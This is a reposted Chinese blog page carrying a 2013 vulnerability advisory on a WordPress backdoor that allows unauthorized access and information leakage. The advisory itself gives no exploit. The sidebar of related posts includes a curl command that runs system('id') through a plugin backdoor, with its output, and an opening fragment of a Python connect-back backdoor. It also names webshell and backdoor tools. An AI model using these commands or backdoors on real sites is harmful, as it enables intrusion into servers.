WordPress Backdoor未授权访问漏洞和信息泄露漏洞

最新推荐文章于 2022-08-13 10:37:24 发布
最新推荐文章于 2022-08-13 10:37:24 发布
阅读量178 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/security4399/p/3494852.html
版权

漏洞名称:WordPress Backdoor未授权访问漏洞和信息泄露漏洞
CNNVD编号:CNNVD-201312-497
发布时间:2013-12-27
更新时间:2013-12-27
危害等级:  
漏洞类型: 
威胁类型:远程
CVE编号: 
漏洞来源:MustLive

WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 
        WordPress中存在未授权访问漏洞和信息泄露漏洞。攻击者可通过后门利用该漏洞获取敏感信息,或获取受影响应用程序的访问权限。

目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: 
        http://cn.wordpress.org/

来源: BID 
名称: 64482 
链接:http://www.securityfocus.com/bid/64482

转载于:https://www.cnblogs.com/security4399/p/3494852.html

weixin_30329623
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
授权访问和数据泄露风险
图幻未来的博客
04-29 496
随着网络技术的发展和应用的普及,网络安全问题日益凸显。其中,授权访问和数据泄露成为当前网络安全的重要威胁之一。本文从多个方面分析了授权访问和数据泄露的原因、危害及对策,以期为网络安全领域的研究和实践提供参考。
WordPress Redux Framework 信息泄露漏洞【CVE-2021-38314】
Armandhe的博客
11-30 744
WordPress Redux Framework 信息泄露漏洞【CVE-2021-38314】
CVE-2022-1609 WordPress Weblizar Backdoor
PolarPeak的博客
05-30 619
$curl-s-d'blowfish=1'-d"blowf=system('id');"'http://localhost:8888/wp-json/am-member/license' uid=33(www-data)gid=33(www-data)groups=33(www-data)
WordPress 插件 Simple Ajax Chat 信息泄露漏洞(CVE-2022-27849)
xiaobai_20190815的博客
04-27 2679
一、漏洞描述 WordPressWordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress 插件 Simple Ajax Chat 20220115及其之前版本存在信息泄露漏洞,目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告 二、影响版本 WordPress 插件 Simple Ajax Chat 2
WordPress插件W3 Total 缓存数据信息泄露漏洞
weixin_30652879的博客
12-28 193
发布时间: 2012-12-28 测试方法: 程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 1 #!/bin/bash 2 # (C) Copyright 2012 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved. 3 # 4 # |---------------| 5 #...
漏洞利用Python代码真的很爽
01-20
/usr/bin/python # Python Connect-back Backdoor # Author: wofeiwo <wofeiwo> # Version: 1.0 # Date: July 15th 2006 import sys import os import socket shell = “/bin/sh” def usage...
WebShells:Webshel​​l漏洞注入列表
05-12
#History这是PHP脚本后门的列表,允许攻击者破坏网站并获得对数据库和敏感目录的完整访问权,基本上是PHP Backdoor Web应用程序Trojan,它可以完全入侵任何网站并获得完整的数据库。 #仅用于教育目的。
shell-backdoor:我创建了此脚本是为了帮助您更轻松地直接攻击网站上的index.php
04-05
壳后门高级版v2 ... 您可以检查以下功能 :grinning_face_with_smiling_eyes: 我会尽快优化更新,以获得更好的体验。 ...如何使用shell后门 查找容易受到黑客攻击的目标网站。... 在获得目标网站之后,我们进行了后门种植 ...
browser-backdoor:BrowserBackdoor是具有JavaScript WebSocket后门和Ruby命令行侦听器的电子应用程序
02-04
浏览器后门 BrowserBackdoor是一个应用程序,它使用JavaScript WebSocket Backdoor连接到侦听器。 BrowserBackdoorServer是一个服务器,它侦听传入的WebSocket连接并创建用于将命令发送到远程系统的命令行界面。 ...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
WordPress的管理员用户名是如何泄露
fmz2222的博客
06-04 1796
WordPress 的管理员账户很容易就能获取,虽然说拿到了管理员账号,用处不是很大,但是不排除有些小白的密码是简单的数字密码。被攻击者爆破或者撞库成功,从而获得后台的管理员账户。那么。攻击者是怎样拿到你的Wordpress 【管理员用户名】的,以及如何保护自己的管理员账户不被获取,这篇文章就来谈谈!!!正在上传…重新上传取消1、先说说管理员账户如何泄露攻击者或者攻击程序构造了: 的URL进行GET,这样99%会返回一串信息,里面包含了你的管理员账户。如下: [{"id":1,"name":"d
渗透测试-Metasploit实战
道阻且长,行则将至。
02-12 4220
RCE漏洞 漏洞信息 漏洞名称:Microsoft Internet Explorer 内存远程代码执行漏洞 CVE编号:CVE-2010-3971 漏洞编号:MS11-003 发布日期:2011-02-08 微软公布:https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-003 影响系统: Mi...
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1232
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 981
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4711
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
网传分享的Wordpressripro主题4.8版本后门分析_盾给网下载修复文件[建站教程]
sinzen的博客
12-18 2193
关于最近网传的日主题ripro4.8版本破解版的后门问题,源码分享源头不清楚,盾给网也是转载免费分享,没想到中了套路。所有在网络上(无论是盾给源码下载网或是其他网站)下载到ripro4.8源码的朋友请好好阅读此文章: 下载后用D盾扫描 发现有加密文件,用Notepad++查看 破解混淆加密后得到源文件 经查看发现后门代码 01 02 03 04 05 ...
wordpress 漏洞_轻松发现WordPress漏洞
热门推荐
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
PHP网站路径泄漏,WordPress出现的绝对路径泄露漏洞及修复方法
weixin_34355933的博客
03-19 1082
现在很多朋友开始使用360网站卫士来检测网站漏洞,我刚刚尝试了一下,耗费时间大概需要50分钟,发现基于WordPress 的站点还是会检测出一些漏洞,虽然不知道这些漏洞是否是高危漏洞,而且由于本人对这块没有研究,不知道是否会影响网站的安全和运行,但是还是想完善这些检测出来的漏洞。只要检测出来的绝对路径的漏洞,我们就可以相对这些文件来完善修复这些漏洞。下面我就针对自己的网站检测出来的漏洞来说说。漏洞...
DC5主机漏洞:目录参数爆破与函数字典剖析
字母如`@`可能表示特殊字符或注释,`backdoor`和`backoffice`暗示可能存在的后门接口,而`backup`和`backup`变体可能与备份功能相关,存在利用漏洞获取备份数据的风险。 4. **版本和品牌标识**: 比如`Apache`, `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值